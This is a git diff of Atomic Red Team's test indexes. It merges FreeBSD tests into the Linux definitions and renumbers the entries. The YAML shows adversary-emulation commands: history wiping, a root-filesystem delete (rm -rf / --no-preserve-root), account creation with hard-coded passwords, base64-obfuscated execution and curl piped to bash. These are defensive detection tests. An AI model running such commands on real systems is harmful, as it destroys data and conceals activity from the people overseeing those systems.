 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # persistence
@@ -342,11 +333,10 @@
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 
 # command-and-control
 - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -381,8 +371,7 @@
 - T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
-  - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
-  - Atomic Test #5: Tor Proxy Usage - FreeBSD [linux]
+  - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu/FreeBSD [linux]
 - T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1571 Non-Standard Port](../../T1571/T1571.md)
   - Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
@@ -441,7 +430,6 @@
 - T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
   - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
-  - Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux]
 - T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1115 Clipboard Data](../../T1115/T1115.md)
   - Atomic Test #5: Add or copy content to clipboard with xClip [linux]
@@ -564,11 +552,10 @@
   - Atomic Test #2: At - Schedule a job [linux]
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 
 # credential-access
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -670,8 +657,7 @@
   - Atomic Test #3: View accounts with UID 0 [linux, macos]
   - Atomic Test #4: List opened files by user [linux, macos]
   - Atomic Test #5: Show if a user account has ever logged in remotely [linux]
-  - Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux]
-  - Atomic Test #7: Enumerate users and groups [linux, macos]
+  - Atomic Test #6: Enumerate users and groups [linux, macos]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
   - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
@@ -782,14 +768,10 @@
   - Atomic Test #7: What shells are available [linux]
   - Atomic Test #8: Command line scripts [linux]
   - Atomic Test #9: Obfuscated command line scripts [linux]
-  - Atomic Test #10: Obfuscated command line scripts (freebsd) [linux]
-  - Atomic Test #11: Change login shell [linux]
-  - Atomic Test #12: Change login shell (freebsd) [linux]
-  - Atomic Test #13: Environment variable scripts [linux]
-  - Atomic Test #14: Environment variable scripts (freebsd) [linux]
-  - Atomic Test #15: Detecting pipe-to-shell [linux]
-  - Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux]
-  - Atomic Test #17: Current kernel information enumeration [linux]
+  - Atomic Test #10: Change login shell [linux]
+  - Atomic Test #11: Environment variable scripts [linux]
+  - Atomic Test #12: Detecting pipe-to-shell [linux]
+  - Atomic Test #13: Current kernel information enumeration [linux]
 - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -880,11 +862,10 @@
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index 0ba52187f..3e69c46b0 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -56,11 +56,11 @@
 - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
   - Atomic Test #1: Clear Bash history (rm) [linux, macos]
-  - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
-  - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
-  - Atomic Test #11: Clear history of a bunch of shells [linux, macos]
-  - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
-  - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
+  - Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
+  - Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
+  - Atomic Test #6: Clear history of a bunch of shells [linux, macos]
+  - Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
+  - Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
   - Atomic Test #3: Base64 decoding with Python [linux, macos]
   - Atomic Test #4: Base64 decoding with Perl [linux, macos]
@@ -574,8 +574,8 @@
   - Atomic Test #2: View sudoers access [linux, macos]
   - Atomic Test #3: View accounts with UID 0 [linux, macos]
   - Atomic Test #4: List opened files by user [linux, macos]
-  - Atomic Test #7: Enumerate users and groups [linux, macos]
-  - Atomic Test #8: Enumerate users and groups [macos]
+  - Atomic Test #6: Enumerate users and groups [linux, macos]
+  - Atomic Test #7: Enumerate users and groups [macos]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
 - T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 1adf31e42..182e011e6 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -116,9 +116,9 @@
   - Atomic Test #1: Install and Register Password Filter DLL [windows]
 - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
-  - Atomic Test #17: Prevent Powershell History Logging [windows]
-  - Atomic Test #18: Clear Powershell History by Deleting History File [windows]
-  - Atomic Test #19: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
+  - Atomic Test #10: Prevent Powershell History Logging [windows]
+  - Atomic Test #11: Clear Powershell History by Deleting History File [windows]
+  - Atomic Test #12: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
 - [T1202 Indirect Command Execution](../../T1202/T1202.md)
   - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
   - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
@@ -492,8 +492,8 @@
   - Atomic Test #5: Delete an entire folder - Windows cmd [windows]
   - Atomic Test #6: Delete a single file - Windows PowerShell [windows]
   - Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
-  - Atomic Test #10: Delete Prefetch File [windows]
-  - Atomic Test #11: Delete TeamViewer Log Files [windows]
+  - Atomic Test #9: Delete Prefetch File [windows]
+  - Atomic Test #10: Delete TeamViewer Log Files [windows]
 - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1221 Template Injection](../../T1221/T1221.md)
   - Atomic Test #1: WINWORD Remote Template Injection [windows]
@@ -1310,7 +1310,7 @@
 - T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
   - Atomic Test #1: Stage data from Discovery.bat [windows]
-  - Atomic Test #4: Zip a Folder with PowerShell for Staging in Temp [windows]
+  - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
 - [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
   - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
 - [T1119 Automated Collection](../../T1119/T1119.md)
@@ -1622,9 +1622,9 @@
   - Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd [windows]
 - T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
-  - Atomic Test #9: Enumerate all accounts on Windows (Local) [windows]
-  - Atomic Test #10: Enumerate all accounts via PowerShell (Local) [windows]
-  - Atomic Test #11: Enumerate logged on users via CMD (Local) [windows]
+  - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
+  - Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
+  - Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
   - Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 2c6dbea53..9023970bf 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -7506,23 +7506,16 @@ defense-evasion:
       description: 'Clears bash history via rm
 
         '
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       supported_platforms:
       - linux
       - macos
       executor:
-        command: 'rm ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (rm)
-      auto_generated_guid: 448893f8-1d5d-4ae2-9017-7fcd73a7e100
-      description: 'Clears sh history via rm
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'rm ~/.sh_history
+        command: 'rm #{history_path}
 
           '
         name: sh
@@ -7531,22 +7524,15 @@ defense-evasion:
       description: 'Clears bash history via echo
 
         '
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       supported_platforms:
       - linux
       executor:
-        command: 'echo "" > ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (echo)
-      auto_generated_guid: a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
-      description: 'Clears sh history via echo
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'echo "" > ~/.sh_history
+        command: 'echo "" > #{history_path}
 
           '
         name: sh
@@ -7558,20 +7544,13 @@ defense-evasion:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'cat /dev/null > ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (cat dev/null)
-      auto_generated_guid: ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
-      description: 'Clears sh history via cat /dev/null
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'cat /dev/null > ~/.sh_history
+        command: 'cat /dev/null > #{history_path}
 
           '
         name: sh
@@ -7583,20 +7562,13 @@ defense-evasion:
       supported_platforms:
       - linux
       - macos
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'ln -sf /dev/null ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (ln dev/null)
-      auto_generated_guid: 3126aa7a-8768-456f-ae05-6ab2d4accfdd
-      description: 'Clears sh history via a symlink to /dev/null
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'ln -sf /dev/null ~/.sh_history
+        command: 'ln -sf /dev/null #{history_path}
 
           '
         name: sh
@@ -7607,20 +7579,13 @@ defense-evasion:
         '
       supported_platforms:
       - linux
+      input_arguments:
+        history_path:
+          description: Bash history path
+          type: path
+          default: "~/.bash_history"
       executor:
-        command: 'truncate -s0 ~/.bash_history
-
-          '
-        name: sh
-    - name: Clear sh history (truncate)
-      auto_generated_guid: e14d9bb0-c853-4503-aa89-739d5c0a5818
-      description: 'Clears sh history via truncate
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: 'truncate -s0 ~/.sh_history
+        command: 'truncate -s0 #{history_path}
 
           '
         name: sh
@@ -7639,22 +7604,6 @@ defense-evasion:
           export HISTFILESIZE=0
           history -c
         name: sh
-    - name: Clear history of a bunch of shells (freebsd)
-      auto_generated_guid: 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
-      description: 'Clears the history of a bunch of different shell types by setting
-        the history size to zero
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: |
-          unset HISTFILE
-          unset histfile
-          export HISTFILESIZE=0
-          export HISTSIZE=0
-          history -c
-        name: sh
     - name: Clear and Disable Bash History Logging
       auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6
       description: 'Clears the history and disable bash history logging of the current
@@ -7705,41 +7654,15 @@ defense-evasion:
         prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
           >/dev/null)\n"
         get_prereq_command: |
-          /usr/sbin/useradd testuser1
-          echo -e 'pwd101!\npwd101!' | passwd testuser1
-          (which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)
+          [ "$(uname)" = 'FreeBSD' ] && pw useradd testuser1 -g wheel -s /bin/sh || /usr/sbin/useradd testuser1
+          [ "$(uname)" = 'FreeBSD' ] && echo 'pwd101!' | pw mod user testuser1 -h 0 || echo -e 'pwd101!\npwd101!' | passwd testuser1
+          (which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)||(which pkg && pkg install -y sshpass)
       executor:
         command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
 
           '
-        cleanup_command: 'userdel -f testuser1
-
-          '
-        name: sh
-    - name: Disable sh History Logging with SSH -T (freebsd)
-      auto_generated_guid: ec3f2306-dd19-4c4b-bed7-92d20e9b1dee
-      description: 'Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T
-        keeps the ssh client from catching a proper TTY, which is what usually gets
-        logged on lastlog
-
-        '
-      supported_platforms:
-      - linux
-      dependencies:
-      - description: 'Install sshpass and create user account used for excuting
-
-          '
-        prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
-          >/dev/null)\n"
-        get_prereq_command: |
-          pw useradd testuser1 -g wheel -s /bin/sh
-          echo 'pwd101!' | pw mod user testuser1 -h 0
-          (which pkg && pkg install -y sshpass)
-      executor:
-        command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
-
-          '
-        cleanup_command: 'rmuser -y testuser1
+        cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y testuser1 || userdel
+          -f testuser1
 
           '
         name: sh
@@ -28349,23 +28272,10 @@ defense-evasion:
       supported_platforms:
       - linux
       executor:
-        command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
+        command: '[ "$(uname)" = ''Linux'' ] && rm -rf / --no-preserve-root > /dev/null
+          2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null
 
           '
-        name: bash
-    - name: Delete Filesystem - FreeBSD
-      auto_generated_guid: b5aaca7e-a48f-4f1b-8f0f-a27b8f516608
-      description: 'This test deletes the entire root filesystem of a FreeBSD system.
-        This technique was used by Amnesia IoT malware to avoid analysis. This test
-        is dangerous and destructive, do NOT use on production equipment.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        command: |
-          chflags -R 0 /
-          rm -rf / > /dev/null 2> /dev/null
         name: sh
     - name: Delete Prefetch File
       auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb
@@ -32072,26 +31982,11 @@ defense-evasion:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
@@ -51032,26 +50927,11 @@ privilege-escalation:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
@@ -56553,29 +56433,14 @@ execution:
         '
       supported_platforms:
       - linux
-      executor:
-        name: sh
-        elevation_required: false
-        command: "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n
-          \"$ART\" |base64 -d |/bin/bash\nunset ART \n"
-    - name: Obfuscated command line scripts (freebsd)
-      auto_generated_guid: 5dc1d9dd-f396-4420-b985-32b1c4f79062
-      description: 'An adversary may pre-compute the base64 representations of the
-        terminal commands that they wish to execute in an attempt to avoid or frustrate
-        detection. The following commands base64 encodes the text string id, then
-        base64 decodes the string, then pipes it as a command to bash, which results
-        in the id command being executed.
-
-        '
-      supported_platforms:
-      - linux
       executor:
         name: sh
         elevation_required: false
         command: |
-          ART=$(echo -n "id" |b64encode -r -)
+          [ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
+          ART=$(echo -n "id" | $encodecmd)
           echo "\$ART=$ART"
-          echo -n "$ART" |b64decode -r |/bin/sh
+          echo -n "$ART" | $decodecmd |/bin/bash
           unset ART
     - name: Change login shell
       auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7
@@ -56601,42 +56466,12 @@ execution:
         name: bash
         elevation_required: true
         command: |
-          useradd -s /bin/bash art
+          [ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
           cat /etc/passwd |grep ^art
           chsh -s /bin/sh art
           cat /etc/passwd |grep ^art
-        cleanup_command: 'userdel art
-
-          '
-    - name: Change login shell (freebsd)
-      auto_generated_guid: 33b68b9b-4988-4caf-9600-31b7bf04227c
-      description: "An adversary may want to use a different login shell. The chsh
-        command changes the user login shell. The following test, creates an art user
-        with a /bin/sh shell, changes the users shell to sh, then deletes the art
-        user. \n"
-      supported_platforms:
-      - linux
-      dependencies:
-      - description: 'chsh - change login shell, must be installed
-
-          '
-        prereq_command: 'if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit
-          1"; exit 1; fi
-
-          '
-        get_prereq_command: 'echo "Automated installer not implemented yet, please
-          install chsh manually"
-
-          '
-      executor:
-        name: sh
-        elevation_required: true
-        command: |
-          pw useradd art -g wheel -s /bin/csh
-          cat /etc/passwd |grep ^art
-          chsh -s /bin/sh art
-          cat /etc/passwd |grep ^art
-        cleanup_command: 'rmuser -y art
+        cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y art || userdel
+          art
 
           '
     - name: Environment variable scripts
@@ -56649,25 +56484,6 @@ execution:
         '
       supported_platforms:
       - linux
-      executor:
-        name: bash
-        elevation_required: false
-        command: |
-          export ART='echo "Atomic Red Team was here... T1059.004"'
-          echo $ART |/bin/bash
-        cleanup_command: 'unset ART
-
-          '
-    - name: Environment variable scripts (freebsd)
-      auto_generated_guid: 663b205d-2121-48a3-a6f9-8c9d4d87dfee
-      description: 'An adversary may place scripts in an environment variable because
-        they can''t or don''t wish to create script files on the host. The following
-        test, in a bash shell, exports the ART variable containing an echo command,
-        then pipes the variable to /bin/sh
-
-        '
-      supported_platforms:
-      - linux
       executor:
         name: sh
         elevation_required: false
@@ -56698,59 +56514,24 @@ execution:
           default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
       dependency_executor_name: bash
       dependencies:
-      - description: 'Check if running on a Debian based machine.
+      - description: 'Check if curl is installed on the machine.
 
           '
-        prereq_command: |
-          if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
-          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
-        get_prereq_command: 'apt update && apt install -y curl
+        prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed";
+          else echo "curl is NOT installed"; exit 1; fi
 
           '
-      executor:
-        name: bash
-        elevation_required: false
-        command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
-          |bash\nls -la /tmp/art.txt      \n"
-        cleanup_command: 'rm /tmp/art.txt
-
-          '
-    - name: Detecting pipe-to-shell (freebsd)
-      auto_generated_guid: 1a06b1ec-0cca-49db-a222-3ebb6ef25632
-      description: 'An adversary may develop a useful utility or subvert the CI/CD
-        pipe line of a legitimate utility developer, who requires or suggests installing
-        their utility by piping a curl download directly into bash. Of-course this
-        is a very bad idea. The adversary may also take advantage of this BLIND install
-        method and selectively running extra commands in the install script for those
-        who DO pipe to bash and not for those who DO NOT. This test uses curl to download
-        the pipe-to-shell.sh script, the first time without piping it to bash and
-        the second piping it into bash which executes the echo command.
-
-        '
-      supported_platforms:
-      - linux
-      input_arguments:
-        remote_url:
-          description: url of remote payload
-          type: url
-          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh
-      dependency_executor_name: sh
-      dependencies:
-      - description: 'Check if running on a Debian based machine.
-
-          '
-        prereq_command: |
-          if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
-          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
-        get_prereq_command: 'pkg update && pkg install -y curl
+        get_prereq_command: 'which apt && apt update && apt install -y curl || which
+          pkg && pkg update && pkg install -y curl
 
           '
       executor:
         name: sh
         elevation_required: false
-        command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url}
-          |bash\nls -la /tmp/art.txt      \n"
-        cleanup_command: "rm /tmp/art.txt      \n"
+        command: "cd /tmp\ncurl -s #{remote_url} |bash\nls -la /tmp/art.txt      \n"
+        cleanup_command: 'rm /tmp/art.txt
+
+          '
     - name: Current kernel information enumeration
       auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14
       description: 'An adversary may want to enumerate the kernel information to tailor
@@ -78714,26 +78495,11 @@ persistence:
         name: bash
         elevation_required: true
         command: |
-          useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-          su art
-          whoami
-          exit
-        cleanup_command: "userdel -r art \n"
-    - name: Create local account (FreeBSD)
-      auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
-      description: 'An adversary may wish to create an account with admin privileges
-        to work with. In this test we create a "art" user with the password art, switch
-        to art, execute whoami, exit and delete the art user.
-
-        '
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        elevation_required: true
-        command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
-          | pw mod user testuser1 -h 0      \nsu art\nwhoami\nexit\n"
-        cleanup_command: 'rmuser -y art
+          password=$(openssl passwd -1 art)
+          ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+          su art -c "whoami; exit"
+        cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser
+          -y art
 
           '
     - name: Reactivate a locked/expired account (Linux)
@@ -81472,7 +81238,7 @@ command-and-control:
           stop-process -name "tor" | out-null
         name: powershell
         elevation_required: false
-    - name: Tor Proxy Usage - Debian/Ubuntu
+    - name: Tor Proxy Usage - Debian/Ubuntu/FreeBSD
       auto_generated_guid: 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7
       description: "This test is designed to launch the tor proxy service, which is
         what is utilized in the background by the Tor Browser and other applications
@@ -81487,12 +81253,15 @@ command-and-control:
           exit 1; fi
 
           '
-        get_prereq_command: 'sudo apt-get -y install tor
+        get_prereq_command: "(which apt && sudo apt-get -y install tor) || (which
+          pkg && pkg install -y tor)\n"
+      executor:
+        command: '[ "$(uname)" = ''FreeBSD'' ] && sysrc tor_enable="YES" && service
+          tor start || sudo systemctl start tor
 
           '
-      executor:
-        command: "sudo systemctl start tor \n"
-        cleanup_command: 'sudo systemctl stop tor
